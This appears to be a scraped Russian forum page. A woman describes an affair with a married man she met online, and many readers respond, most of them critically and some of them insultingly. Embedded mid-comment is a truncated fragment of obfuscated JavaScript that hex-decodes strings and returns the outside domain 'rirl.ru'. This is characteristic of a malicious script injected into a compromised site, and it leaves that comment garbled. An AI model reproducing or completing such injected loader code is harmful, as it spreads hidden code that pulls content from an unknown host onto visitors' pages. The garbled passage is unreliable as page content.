Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-03 13:29:26 от Гость
Здравствуйте мы смужем вместе 12 лет. есть двое детей. было всякое но последнее время стала очень мучить проблема отсутствия работы у мужа я работаю. в начале отношений училась потом была в декрете но потом постоянно работала чтобы ни случилось и как ... Подробнее
Последний комментарий
История : Грусть
час назад2016-12-03 22:17:31 от Гость
Арийка*** , спасибо), писать я конечно не умею но как вам стихотворение? Все комментарии67479
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Истории о любви
На работу к папе
семь часов назад2016-12-03 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Комедия
27 ноября в 16:31:09
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Лев
23 ноября в 17:13:44
Истории о любви - Женатый\" друг\"\"
Истории о любви : Женатый\     Познакомились мы в интернете. Когда-то давным давно я зарегестрировалась на сайте знакомств, посидела там какое-то время, и забыла про него...прошло несколько месяцев, был вечер, делать было нечего, отношения с парнем на грани развала, зашла на этот сайт, а там он "Привет-Привет", так и завязалось наше знакомство...с парнем рассталась, на сайте стала появляться все чаще, потом вообще каждую свободную минуту, общались с ним, обо всем общались, о погоде, об отношениях, о дружбе, жизни, он мне помогал советами, подсказывал где и как лучше поступить, я знала что он женат, с самого начала, он это и не скрывал. Встретиться никогда не предлогал, нам и так было хорошо, я считала его другом, в это время у меня начались новые отношения, я встретила парня, мой интернетный друг оч радовался за меня, но потом я стала замечать с его стороны колкие высказывания в адрес моего парня, стала ограничивать общение. На тот момент я училась на последнем курсе, и тут мы сдевченками решили собраться посидеть, поболтать, пишет мне он и просит встретиться, я не думая ни о чем, отвечаю да, и он приезжает за мной, мы каталис по городу, болтали, такое ощущение что мы знаем друг друга всю жизнь) Наши встречи стали все чаще, парня своего я забросила, потому что почти все вечера проводила со своим женатым другом,мы общались, смеялись, гуляли, и в завершении вечера всегда был поцелуй, я улетала в эти моменты...Да настал тот момент когда мы стали близки, я не могу сказать, что я жалею об этом, он мне больше, чем любовник, он мне друг, который поддержит, поможет, подскажет где и как правильно поступить. Этот человек показал мне как мужчина может относится к женщине,как он может решать ее проблемы, как женщине может хотеться слушать мужчину, с ним у меня все это было, и я теперь понимаю, что на меньшее я не согласна, человек поднял мне самооценку настолько, что я начала себя любить, правда любить и ценить! за 8 месяцев что мы встречаемся было все, и жена узнавала про меня, я его ругала, за то что не чистит телефон как следует, он молчал...и прекращали мы общаться, я смирилась, я ж знаю, что семья в любом случае важнее, но он вернулся, и мы опять общаемся, он говорит, что зависим от меня, я молчу, он говорит, что не может без меня, я отвечаю, что может.Сейчас мы просто общаемся, так же в интернете, он приезжает, но у нас нет ничего, да мне и не надо, уводить я его из семьи не хочу, мне просто ценен он как друг, советник, собеседник, он эт понимает, и вроде все хорошо, но все равно какая-то фигня...Я знаю, что скоро они переедут, и в принципе тут то наверное точка и будет нашему общению, но блин, я тоже планировала переехать туда, жить и работать там, а теперь придется менять свои планы. Как то сумбурно все получилось...просто охота послушать мнения...
61807
Другие Истории о любви
(35)
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7610 30
08 ноября 2015 13:34:14
2015-11-08 13:34:14

Я не поняла ваше высказываение. И возник вопрос у меня, не знаю как у других. Как женатый мужчина может поднять самооценку женщине?При том, что он ни вас не жену не уважает. Как такое может придти в голову?Чем он поднял вам самооценку?Тем что бегает и работает на 2 фронта?Что врет и вам и жене? Вот уж прямо причины для поднятия самооценки.

Ответить
Поддерживаю Да7 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Tanita
19287 Tanita
Tanita offline
Репутация : 89610
Комментариев 765 0
08 ноября 2015 14:37:24
2015-11-08 14:37:24

Неалина, наверное тем, что она таскается с женатым, что она второе место, ей прикольно, она от этого получает удовольствие!

Ответить
Поддерживаю Да4 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка offline
Репутация : 1662407
Комментариев 6907 36
08 ноября 2015 14:43:27
2015-11-08 14:43:27

Неалина, Точно такой же вопрос сразу возник и у меня. "Он показал, как мужчина может относиться к женщине". Как? Как к запасному варианту? Как к сексуальному удовлетворению "по желанию"?

Видимо ваша самооценка была совсем уж ниже нуля, если даже такие ущербные отношения смогли вам ее поднять.

Надеюсь, когда-нибудь вы встретите свободного мужчину, для которого вы и только вы будете важной, значимой, любимой. Только ваше тело будет желанным. Мужчину, который никуда не захочет уходить из вашей постели. Если этот мужчина достойный, и ты знаешь, что он твой, только твой и ничей другой - вот это поднимает самооценку женщине.

А вас просто потрахивают время от времени, говоря красивые слова. Все остальное - уважительное отношение, поддержка, советы, дружба... - это все должно быть и есть в любых нормальных гармоничных отношениях.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да8 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Диор
12701 Диор
Диор offline
Репутация : 420775
Комментариев 4864 46
08 ноября 2015 14:46:16
2015-11-08 14:46:16

Я считаю что такие отношения не понимают самооценку.

Наоборот ты теряешь свое лицо и себя.

Ответить
Поддерживаю Да9 / Нет0
Ну нельзя нравится всем подряд,нужно же кого-то и раздражать для разнообразия)))
Птаха
Птаха

08 ноября 2015 14:46:27
2015-11-08 14:46:27
"как женщине может хотеться слушаться мужчину... " меня именно эти слова насторожили))) Похоже, Ваш знакомый "в Теме". Хотите совет, бегите от него как можно быстрее. "Тема" затягивает, а Ваш знакомый неплохой психолог))) ну и ко всему, неплохой(хочется думать) Верхний. Если все так как я думаю, то повсему Ваш знакомый Вас просто напросто "вербует"))) Для себя) задайте знакомому вопрос: давно ты в Теме? И посмотрите на его реакцию. Я могу и ошибаться.
Ответить
Поддерживаю Да0 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7610 30
08 ноября 2015 14:54:56
2015-11-08 14:54:56

Сиреневая Кошка, Нам с вами видимо не понять автора. Для нее такие отношения это видимо что то возвышенное и высокое. А для нас болото. Ну что ж поделать. Нам не понять мы так видимо не любили как она. Для нее гавное пришли и справили как говорится нужду в нее и все.

Ответить
Поддерживаю Да0 / Нет1
Обидеть Лену может каждый!Не каждый сможет убежать!
переоценка ценностей
20357 переоценка ценностей
переоценка ценностей offline
Репутация : 331
Комментариев 31 2
08 ноября 2015 14:57:14
2015-11-08 14:57:14

Вы поступаете, не правильно. У него же семья. Вы говорите, что не собираетесь, уводить из семьи, но делаете это. Зачем вообще, заходить так далеко, зная, что у него семья?!

Ответить
Поддерживаю Да2 / Нет0
Завтра будет лучше,чем вчера..
Инна Р
19181 Инна Р
Инна Р offline
Репутация : 73528
Комментариев 795 2
08 ноября 2015 14:57:32
2015-11-08 14:57:32

Автор и каких советов вы хотели послушать? Тут помоему всё очевидно. Этот перчик изучил ваш характер и умело вами манипулирует. Потому что по идее самооценка от связей с женатыми понижается и не дай бог вообще кому то влюбиться в несвободного, а если уж и влюбился, надо сразу же пресечь близкую связь и не ввязываться. А вы ещё и полагаете что самооценка у вас поднялась. Вам даже в этой ситуации не противно почему то. И не обидно ни за себя ни за его жену. Ну конкретный манипуляторщик. Не понимаю, чем вас не устраивали по интернету диалоги, и зачем надо было в реале знакомиться?

Ответить
Поддерживаю Да3 / Нет0
Диор
12701 Диор
Диор offline
Репутация : 420775
Комментариев 4864 46
08 ноября 2015 15:21:44
2015-11-08 15:21:44

Инна Р, просто пареньку по приколу, юных дурех раскручивать и мозг им пудрить, она очередной эксперимент.

Ответить
Поддерживаю Да2 / Нет0
Ну нельзя нравится всем подряд,нужно же кого-то и раздражать для разнообразия)))
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7610 30
08 ноября 2015 15:23:50
2015-11-08 15:23:50

И автор не без вас он не может, а без удовлетворения своих потребносте на стороне.

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Птаха
Птаха

08 ноября 2015 15:31:11
2015-11-08 15:31:11
Автор, мне очень хочется ошибаться, но если я все же права, то рвите отношения, ничем хорошим, кроме как психологической зависимостью, эти отношения не закончатся. Для остальных могу сказать, секс для таких отношений не на первом месте, здесь важны сами отношения. Автору:со временем Вас из вас(прошу прощения за тавтологию) просто "вынут", внутри Вас будет только "Он". А это ни семьи, ничего. А надо Вам это?
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

08 ноября 2015 15:31:15
2015-11-08 15:31:15
Слабохарактерная девушка. Хотя я все чаше знакомлюсь с девушками которые рассуждают так же. не поддерживаю, но и не осуждаю. Все мы делаем глупости. Единственное, девушки обычно впадают в такие отношения когда у них вообще нет никаких отношений. А вы намеренно отказываетесь от нормальных отношений, ради больных. Этого я никогда не пойму. Зачем?? Нет дружбы между мужчиной и женщиной. Он ищет выгоду. Не зацикливайтесь на нем. Живите своей жизнью, посмотрите по сторонам!
Ответить
Поддерживаю Да2 / Нет0
Инна Р
19181 Инна Р
Инна Р offline
Репутация : 73528
Комментариев 795 2
08 ноября 2015 15:39:47
2015-11-08 15:39:47

Диор, Лишь бы до автора дошло.

Ответить
Поддерживаю Да1 / Нет0
Диор
12701 Диор
Диор offline
Репутация : 420775
Комментариев 4864 46
08 ноября 2015 15:40:17
2015-11-08 15:40:17

Что характерно все чаще слышу о таких отношениях.

И не стыдно девушкам.

Как то на днях была клиентка , это немое дело, я ни когда не интересуюсь личной жизнью клиенток, она сама начала мне рассказывать что привез ее любовник, и что они друзья))) я старалась делать вид что слушаю, а сама думала о работе.

Ответить
Поддерживаю Да0 / Нет0
Ну нельзя нравится всем подряд,нужно же кого-то и раздражать для разнообразия)))
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7610 30
08 ноября 2015 15:43:02
2015-11-08 15:43:02

Диор, Когда спят уже не друзья, а любовники.

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Диор
12701 Диор
Диор offline
Репутация : 420775
Комментариев 4864 46
08 ноября 2015 15:48:02
2015-11-08 15:48:02

Неалина, это ты ей расскажи

Ответить
Поддерживаю Да0 / Нет0
Ну нельзя нравится всем подряд,нужно же кого-то и раздражать для разнообразия)))
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7610 30
08 ноября 2015 15:56:16
2015-11-08 15:56:16

Диор, Я бы с удовольствием, но кто меня послушает из них?

Ответить
Поддерживаю Да0 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Kyrsoved
20355 Kyrsoved
kyrsoved offline
Репутация : 60215
Комментариев 784 4
08 ноября 2015 16:14:21
2015-11-08 16:14:21

а с его женой вы подружиться не хотите?

Ответить
Поддерживаю Да0 / Нет0
Даже в выходные помни, что движение - это жизнь. Поэтому лежа на диванчике поддергивай ножкой.
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 2895502
Комментариев 17167 30
08 ноября 2015 16:30:15
2015-11-08 16:30:15

Ну по моему уже то, что он Вас держал в любовницах уже не может быть показателем отличного отношения мужчины к женщине...

А вообще, женатики все няшные. Им же чем-то любовницу около себя удерживать нужно, вот и строят из себя Д'Артаньянов. =) Показывают какие они решальщики проблем и что просто супер мужики. Таким образом они компенсируют то, что они женаты и девушке нет смысла рассчитывать на то, что у отношений будет развитие. Да и чтобы девушка спокойно сидела в подполье, терпела то, что она вроде как никто.

Вообще, сколько читаю о сайтах знакомств то понимаю, что там сидят одни извращенцы и женатики, которые хотят найти секс без обязательств.

Да и о какой дружбе с ним речь? Сами то себе не лгите. Ведь писала же Вы, что он позволяет колкие замечания в адрес Ваших молодых людей. Да и как может быть объективен тот, кто претендует на секс с Вами?

Не верю я в такие дружбы. Вам просто самой такой любовный треугольник - нравится. Он переедет в другой город, Вы переедите тоже, хоть и пишите что нет. Ну не хотела бы с ним иметь дел, послала бы его качественно. А так... Вдруг оказывается, что планы даже совпадают по поводу переезда. =)

Нравится Вам доедать объедки и быть на вторых ролях, лишь бы он красивые слова говорил и клялся в вечной любви. Вам больше ничего не нужно. Вы именно так измеряете хорошее отношение.

Ответить
Поддерживаю Да6 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249460
Комментариев 2461 8
08 ноября 2015 19:08:45
2015-11-08 19:08:45

Автор, на самом деле Вы хотите, что б он ушел из семьи, и переедите туда, куда он. Вы, зная, что он женат -пошли на эти отношения, значит Вам нужно и продолжение, просто он не решается бросить жену. Не лукавьте. Переспать -могу и буду, а из семьи - не уведу, я скромная)

Ответить
Поддерживаю Да0 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
MarkizaS
20384 MarkizaS
MarkizaS offline
Репутация : 0
Комментариев 4 0
08 ноября 2015 20:42:50
2015-11-08 20:42:50

Я бы скорее всего, на месте девушки, после первой близости, вообще прекратила общение с мужчиной. Ведь все и так стало понятно, что одним разом дело не закончится, он уже привык не только к общению, но и к тому что у Вас с ним близость. Жалко мне жену в этой ситуации, видимо ваш мужчина не очень то и старался скрывать вас от нее. Моё мнение, надо заканчивать отношения и больше с ним не встречаться.

Ответить
Поддерживаю Да1 / Нет0
Инна Р
19181 Инна Р
Инна Р offline
Репутация : 73528
Комментариев 795 2
08 ноября 2015 21:58:19
2015-11-08 21:58:19

Странная_Такая , И мне так показалось. Она соперничает с его женой и хочет смены ролей, хочет просто заполучить роль жены, а нынешнюю на выброс. И видимо это желание вызывает в ней азарт, что даже историю про женатика-любовника написала. И советов ещё хочет.

Ответить
Поддерживаю Да0 / Нет1
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7610 30
08 ноября 2015 22:00:21
2015-11-08 22:00:21

Инна Р, Зря хочет советов. Ей никто тут не посоветует как чужого мужа отнять.

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249460
Комментариев 2461 8
08 ноября 2015 22:08:49
2015-11-08 22:08:49

Инна Р, Особенно, ну блин, и я хотела переехать туда, но и он с женой туда едет... Просто планета такая маленькая, что нужно переезжать именно туда, куда едет тот, с кем автор хочет расстаться))))

Ответить
Поддерживаю Да2 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16103 6
09 ноября 2015 04:24:13
2015-11-09 04:24:13

Автор, забавная вы! И как же это он вам поднял самооценку то? Вы довольствовались крошками с барского стола, он выделял вам часик в своем плотном расписании и это поднимало вам самооценку? Или то, что он бегал из кровати в кровать вам поднимало самооценку? А может то, что вы всегда были второй - это быть может поднимало вам самооценку? Расскажи, каким образом то он ее поднял, прям даже интересно стало!

Он с самого начала хотел от вас секса, а вся эта дружба, советы, поддержка - это лишь антураж, мишура! И перестаньте тут уже, что он нужен вам как друг! Был бы нужен как только друг, так не променяли бы своего парня на него, а общались бы все также, как раньше, а у вас каждодневные встречи и парень послан в далекое эротическое и после этого вы тут рассказываете, что он вам просто друг? Ну, уж себе то хоть не врите!

Все женатики по ушкам, до по ушкам, мастера красивого словца, а вам только это и нужно. Помогает он вам? Конечно, а как вас еще то удержать? Мужиков свободных много, а вдруг вы прозреете, спадет пелена с ваших глаз, что он такой идеальный и сбежите вы от него, вот он и старается!

Вообщем, все это вам самой нравится, иначе парня бы вы не бросили! По ушкам проехал, вы и рады, он тоже доволен, что и тут получает, и там получает.

Планы вам менять придется? А мне вот кажется, что вы за ним поедете! Как же вы без него то и без его проездов по вашим ушам? Это вы нам тут рассказываете про дружбу, а на деле не дружба там, и попретесь вы скорее всего за ним. Поддерживаю полностью Машуню Блондиночка .

Ответить
Поддерживаю Да3 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Гость
Гость

09 ноября 2015 10:34:35
2015-11-09 10:34:35
И какие мнения вам охота послушать?Интересно просто очень))Как вам он поднял самооценку?Тем что переспал с вами?Тем что покатал на машине?Ну сразу же он не полез бы к вам предложениями затащить вас в постель. Просто сначала надо было как то войти к вам в доверие, произвести на вас хорошее впечатление. Вот этого он добился и на тебе вы растаяли))И как всегда, уже вторая история где девушка знала что мужчина женатый и все равно идет к нему на встречу осознанно. Зная все. Просто зачем вам это надо?И парня своего вы не любили, так как сразу же его бросили ради женатого мужчины. И ну и что что у вас с вашим парнем что то не ладилось на тот момент. Ведь надо было решать проблемы с ним а не на сайтах знакомств сидеть. Но видно вам человек не был ценен. Если бы он был для вас дорогим человеком, и эти отношения вам были бы ценны то вы решали бы их а не сидели на сайте знакомств. При том даже и если вы расстались с вашим парнем, то вы все равно не должны были дать право кому то что бы он оскорблял вашего уже бывшего парня. Ведь как ни как вы были с ним вместе и это был ваш выбор каким бы человек не был это был ваш выбор. ВАШ ВЫБОР!Только ваш.
Ответить
Поддерживаю Да1 / Нет0
ксюня-звезда
7355 ксюня-звезда
Ксюня-звезда offline
Репутация : 173945
Комментариев 5950 9
12 ноября 2015 21:37:24
2015-11-12 21:37:24

А зачем вы с ним грани дружеские переходили?Если уж он женат то и общались бы с ним по-дружески, а вы почему-то позволяли ему много и пофиг вам было что он женат!

Ответить
Поддерживаю Да1 / Нет0
ХОТЕЛА ЗАМУЖ... Пересмотрела взгляды на жизнь!.....Теперь хочу длинные волосы, новые туфельки, машин
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 249460
Комментариев 2461 8
13 ноября 2015 02:23:40
2015-11-13 02:23:40

ксюня-звезда , Господи, да каие грани..... ?! Обычная схема:женатик охмурил барышню, далее: типичный съезд от любовницы. А Автор сидит и лапшу с ушей за плечи закидывает. Да нет дружбы между женатым мужчиной и женщиной в поиске.

Ответить
Поддерживаю Да2 / Нет0
Та, которая танцевала, казалась безумной тем, кто не мог слышать музыку.
Гость
Гость

13 ноября 2015 09:19:40
2015-11-13 09:19:40
Странная_Такая , Вот именно. Но жаль что некоторые этого не понимают. Как некоторые так наивно верят в сказки. Как будто маленькие дети. Пора бы уже взрослеть)
Ответить
Поддерживаю Да0 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7610 30
13 ноября 2015 09:40:50
2015-11-13 09:40:50

Я не понимаю как до конца можно поверить женатому мужчине?Ведь он обманывает свою жену изменяя ей, что ему стоит наговорить не правды любовнице тогда?Да ничего. Ведь жене он тоже как то свои отлучки и задержки объясняет. Он же не говорит ей:"Дорогая!Не теряй, я у любовницы. "А она ему:"Хорошо дорогой!Спасибо что сказал, теперь я не волнуюсь. Ты в надежных объятиях любовницы. "Это же так не бывает. Не какая жена после такой фразы не скажет что ну ладно иди. Скорее выгонит в свободное плавание вместе с вещами. А остальное ложь то что он живет и встречается с другой и обман жены. Так что уж не знаю чему там можно верить в их словах. Тем более что чужая семья это всегда потемки для тех кто с ней хорошо не знаком. Чтобы делать выводы почему муж гуляет от жены надо точно знать причины. Не всегда сам гуляющий муж может это объяснить. Захотелось ему и все и пошел во все тяжкие. И там жена пусть хоть фотомодель будет и супер пупер кулинар и отличная хозяйка, а он на лево. Даже если она нежная и понимающая. Если жена такая плохая и неустраивающая на мой взгляд подавай на развод когда ничего не можешь изменить в отношениях с ней. Но нет же. мужчина идет на лево и от жены не уходит. Значит причина не в жене, а в нем самом.

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Гость
Гость

13 ноября 2015 23:39:04
2015-11-13 23:39:04
честно сказать не понимаю, почему идут укоры в сторону автора, на мой взгляд я не увидела ничего страшного, друг сам решил пойти на встречу, завязались отношения, я вас прекрасно понимаю, что человек для вас значил многое, ведь когда человек становится настоящим другом, это намного больше чем просто любовник. думаю у вашего"друга" есть к вам желание, недосказанное что то, на самом деле лучше убейте эти отношения, потом просто все перерастет не понятно во что и все станет обыденностью, а так будете вспоминать хоть о нем с улыбкой
Ответить
Поддерживаю Да0 / Нет2
Гость
Гость

13 ноября 2015 23:41:52
2015-11-13 23:41:52
Гость, Еще спрашиваете ПОЧЕМУ?А то что у него семья это не повод да?
Ответить
Поддерживаю Да1 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7610 30
14 ноября 2015 17:53:05
2015-11-14 17:53:05

Bleeding soul, Есть такие для которых наличие семьи не повод отказа от встречь. Они видимо считают, что они тут не при чем и если что то мужчина сам виноват, а они не при чем.

Ответить
Поддерживаю Да1 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Гость
Гость

14 ноября 2015 17:54:09
2015-11-14 17:54:09
Неалина, Фигею от таких людей!!
Ответить
Поддерживаю Да2 / Нет0
Неалина
5436 Неалина
Неалина offline
Репутация : 443112
Комментариев 7610 30
14 ноября 2015 17:56:06
2015-11-14 17:56:06

Bleeding soul, Я тоже. Зато случись у самих то взгляд быстро у них меняется.

Ответить
Поддерживаю Да2 / Нет0
Обидеть Лену может каждый!Не каждый сможет убежать!
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке